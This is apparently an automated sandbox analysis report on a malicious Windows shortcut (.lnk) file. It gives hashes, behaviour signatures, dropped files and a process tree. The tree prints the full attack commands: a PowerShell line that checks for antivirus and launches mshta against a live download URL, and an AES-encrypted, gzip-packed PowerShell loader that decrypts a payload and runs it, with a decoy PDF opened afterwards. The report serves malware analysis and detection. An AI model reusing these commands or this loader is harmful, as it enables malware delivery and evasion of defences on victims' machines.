Analysis

  • max time kernel
    157s
  • max time network
    165s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/03/2024, 02:53

General

  • Target

    87fd596f4d7e04095b410a932c6bf2604ed876d668ed28c99a737165fe50f804.lnk

  • Size

    2KB

  • MD5

    69ef84c707923b7b6c048fd0e3800d60

  • SHA1

    cdd1637356be8ab43ac60e33f5889d501ae69b35

  • SHA256

    87fd596f4d7e04095b410a932c6bf2604ed876d668ed28c99a737165fe50f804

  • SHA512

    fc2c3450ccc621bfc2d156c36f05278072366012695a7aa55d2280a5276d9e517985c47926f306a9e0b59e15a1974925f6d9acd205283879e8241013bf006157

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://hadicovn.com/pypy/favvy

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\87fd596f4d7e04095b410a932c6bf2604ed876d668ed28c99a737165fe50f804.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $y = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($l in $y ){if ($l.displayName -replace 'Windows Defender', ''){Exit}}.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://hadicovn.com/pypy/favvy;$pPQJ = Get-Location;$pPQJ = Join-Path $pPQJ '141221-NTD-GIAHUY-NP.lnk';del $pPQJ
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3792
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://hadicovn.com/pypy/favvy
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4776
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $VoBss = 'AAAAAAAAAAAAAAAAAAAAAOOgdG222EPB70xHO2Fct2QIACziLVGcI99ARrzr/6iVF2hhVVbe/5KJ1NbeXyb4kZ0pWJGOnAtM4asErvbF/ohefKosRqQwj6txldcsA+e0SuFMsSU8uSPBT/X6/PGNdfhoTRsQZhp0au2EwuWb0Udu3+LvXCJUKwotXTmGfniJBvhZjRGs2T8VfJd52GawXrVUJtr/vZOTeLHdF2umRb8bnLr/+zyWb6Y9elPtv+NbkW5y5J8HmQ6U8s2oYwdW80Ybv/AxcTgI/ZC0BpksdCfASCg97eKM8RfJuJ9Hgzf/SLGdbYMDWbrEiKo17vOOh3AkXyp2zRSAgh5jj88FNanVbpWVlH1XS3MOYNbr5Imn0O7VzyJNXlP/UHv52ChbBL2hZTGoUdGMx+McGz2x4kiISWC1AWoYB7f6hAwvtbfLEpvLFPYWFNeeR3LXbOq9nG+sqnjWF8YHft4IBO3FFB5ANnEOKP6hvidhsNRoyvWbSlDas+Dfnx1+9zp8B80PGMQjUg+XiV5A6OSVitJfIcivpM2y/Vj4X9qHjXKXBd4tqtWttwUuph12cc9kQFUeKKV45e/3AshG3N5dybsBQscdP6vsoNFJG5cPwtWy10IRKuVhkT49N5Erqw7NubFXDFwmi5Bm8ilbHyuZn7xwvAIyWnVAMiijkm8TLwoQRW6jM2FFa7dw0pa+/iDR97hsLXqaSJPSAzIB5v38TZf0Yluftz4voKwRUoHx0xaXqKhPPnVDGoPEBsLt+a1OiL1CdVek56ZkoCgTfiPikAabP1LiJMxfrZHQgufv2ovz/t6QdCJ8a2OxlSGKWfHKF5glg1FMKHkcT0p5T5jdcYK++cQ=';$XigGJO = 'UnllTlZVS1FkWWlHYUNaVmVERlhTS2JKS0VnWWVQY24=';$pbMVggD = New-Object 'System.Security.Cryptography.AesManaged';$pbMVggD.Mode = [System.Security.Cryptography.CipherMode]::ECB;$pbMVggD.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$pbMVggD.BlockSize = 128;$pbMVggD.KeySize = 256;$pbMVggD.Key = [System.Convert]::FromBase64String($XigGJO);$abYla = [System.Convert]::FromBase64String($VoBss);$zeXkXPfr = $abYla[0..15];$pbMVggD.IV = $zeXkXPfr;$MrZtvZURj = $pbMVggD.CreateDecryptor();$eNppDBPDp = $MrZtvZURj.TransformFinalBlock($abYla, 16, $abYla.Length - 16);$pbMVggD.Dispose();$GDkQmNA = New-Object System.IO.MemoryStream( , $eNppDBPDp );$LqGNOoVK = New-Object System.IO.MemoryStream;$VXOGsHtYY = New-Object System.IO.Compression.GzipStream $GDkQmNA, ([IO.Compression.CompressionMode]::Decompress);$VXOGsHtYY.CopyTo( $LqGNOoVK );$VXOGsHtYY.Close();$GDkQmNA.Close();[byte[]] $dqTqNw = $LqGNOoVK.ToArray();$dHgiuH = [System.Text.Encoding]::UTF8.GetString($dqTqNw);$dHgiuH | powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2184
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
            5⤵
            • Blocklisted process makes network request
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4532
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Blank.pdf"
              6⤵
              • Checks processor information in registry
              • Modifies Internet Explorer settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3448
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                7⤵
                  PID:5056
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                  7⤵
                    PID:4476
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2072
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F014D288C7BF13759A8C4076968E43C8 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      8⤵
                        PID:3680
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=20BCF2F0C8801E2206B88E0DA43D28D5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=20BCF2F0C8801E2206B88E0DA43D28D5 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
                        8⤵
                          PID:2304
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D9C76436D5BF1C7CD28C6423BB774C57 --mojo-platform-channel-handle=2168 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                          8⤵
                            PID:5004
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8FA0D7533B9D3B6525AD763E31F2E09A --mojo-platform-channel-handle=2280 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                            8⤵
                              PID:4592
                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AC1E3B50EC7668A3D41D7343AC717BA6 --mojo-platform-channel-handle=1936 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                              8⤵
                                PID:5004
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E508D2FA9ACE9152A5111C31B415BF5A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E508D2FA9ACE9152A5111C31B415BF5A --renderer-client-id=8 --mojo-platform-channel-handle=2276 --allow-no-sandbox-job /prefetch:1
                                8⤵
                                  PID:5384
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                7⤵
                                  PID:4796
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4004 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8
                      1⤵
                        PID:1368

                      Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                              Filesize

                              64KB

                              MD5

                              44f4cca7af79967765e90dbdaa7a2d84

                              SHA1

                              d5b10e0c31ea482da5397973f65e0c97999e5641

                              SHA256

                              7d89194616353b1e7866dddcbbf79fde953deccc7b84e102c1577e16d77ca30b

                              SHA512

                              c9a265dace3c54a25b1ca1a44f96bcc456f932d7a3699d959b3e17802b1afe21087d53de8e2fae4edded2151c34f28a9619682e9610523149267d52b207a10c6

                            • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                              Filesize

                              64KB

                              MD5

                              31e646edb01448142f8ecdab9b42cd1f

                              SHA1

                              7b47d930180b1a7aab88a82e67abf93ebb77f2e3

                              SHA256

                              846aa2414d0dd80f9a06da066f759592066a7d68b5da537e91577881735c32b3

                              SHA512

                              fefb51d432b2b1a6753b3bc5bce780cb438e7ff3b470c761511cd83a28a87eec271977878b1affe2a3e5830ecf4c9b5c0c2d004388eb3f4944adfd6d8c18ecc5

                            • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                              Filesize

                              36KB

                              MD5

                              b30d3becc8731792523d599d949e63f5

                              SHA1

                              19350257e42d7aee17fb3bf139a9d3adb330fad4

                              SHA256

                              b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                              SHA512

                              523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                            • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                              Filesize

                              56KB

                              MD5

                              752a1f26b18748311b691c7d8fc20633

                              SHA1

                              c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                              SHA256

                              111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                              SHA512

                              a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                              Filesize

                              2KB

                              MD5

                              6cf293cb4d80be23433eecf74ddb5503

                              SHA1

                              24fe4752df102c2ef492954d6b046cb5512ad408

                              SHA256

                              b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                              SHA512

                              0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              1KB

                              MD5

                              b0a78e60bfb279d18fd3d6e7a67411f5

                              SHA1

                              9344fe3654a14bc66afb9dc6ea215fabfbe5c906

                              SHA256

                              a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb

                              SHA512

                              9548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2nsw4mu.qbu.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Roaming\Blank.pdf

                              Filesize

                              25KB

                              MD5

                              ca5fa899813752a4ecf8156651280523

                              SHA1

                              ce0d62bbbcbabd1911d848b383e83fee7c1f84c0

                              SHA256

                              74e3f0ca8a84ae53c0ef56cab9478692a63fab01e07106d10eedcf7d8f795deb

                              SHA512

                              0f13f99890f19cc00e6a14e87708131bb2459c62d7cfcb772d15deee95823bc4b0297e661a99ba8fa12e5e832abb65fffa7513bc4c272f6ba8ab4faa8b67323e

                            • memory/2184-59-0x0000022F9C3C0000-0x0000022F9C3D0000-memory.dmp

                              Filesize

                              64KB

                            • memory/2184-26-0x0000022F9C3C0000-0x0000022F9C3D0000-memory.dmp

                              Filesize

                              64KB

                            • memory/2184-37-0x0000022F9C3C0000-0x0000022F9C3D0000-memory.dmp

                              Filesize

                              64KB

                            • memory/2184-25-0x0000022F9C3C0000-0x0000022F9C3D0000-memory.dmp

                              Filesize

                              64KB

                            • memory/2184-55-0x00007FFCA0D60000-0x00007FFCA1821000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/2184-56-0x0000022F9C3C0000-0x0000022F9C3D0000-memory.dmp

                              Filesize

                              64KB

                            • memory/2184-24-0x00007FFCA0D60000-0x00007FFCA1821000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3448-206-0x000000000A130000-0x000000000A15A000-memory.dmp

                              Filesize

                              168KB

                            • memory/3792-17-0x00007FFCA22D0000-0x00007FFCA2D91000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3792-11-0x000001E178C50000-0x000001E178C72000-memory.dmp

                              Filesize

                              136KB

                            • memory/3792-12-0x00007FFCA22D0000-0x00007FFCA2D91000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/3792-13-0x000001E15E8C0000-0x000001E15E8D0000-memory.dmp

                              Filesize

                              64KB

                            • memory/3792-14-0x000001E15E8C0000-0x000001E15E8D0000-memory.dmp

                              Filesize

                              64KB

                            • memory/4532-49-0x0000018627AF0000-0x0000018627B00000-memory.dmp

                              Filesize

                              64KB

                            • memory/4532-60-0x00007FFCA0D60000-0x00007FFCA1821000-memory.dmp

                              Filesize

                              10.8MB

                            • memory/4532-61-0x0000018627AF0000-0x0000018627B00000-memory.dmp

                              Filesize

                              64KB

                            • memory/4532-62-0x0000018627AF0000-0x0000018627B00000-memory.dmp

                              Filesize

                              64KB

                            • memory/4532-52-0x000001862A2D0000-0x000001862A346000-memory.dmp

                              Filesize

                              472KB

                            • memory/4532-51-0x0000018629D70000-0x0000018629DB4000-memory.dmp

                              Filesize

                              272KB

                            • memory/4532-50-0x0000018627AF0000-0x0000018627B00000-memory.dmp

                              Filesize

                              64KB

                            • memory/4532-48-0x0000018627AF0000-0x0000018627B00000-memory.dmp

                              Filesize

                              64KB

                            • memory/4532-47-0x00007FFCA0D60000-0x00007FFCA1821000-memory.dmp

                              Filesize

                              10.8MB